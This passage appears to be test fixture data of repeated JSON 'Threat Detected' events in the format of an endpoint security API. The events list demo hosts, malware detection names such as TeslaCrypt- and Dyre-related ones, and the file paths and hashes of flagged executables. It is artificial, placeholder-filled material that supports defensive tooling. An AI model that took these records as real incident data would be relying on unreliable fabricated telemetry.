
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
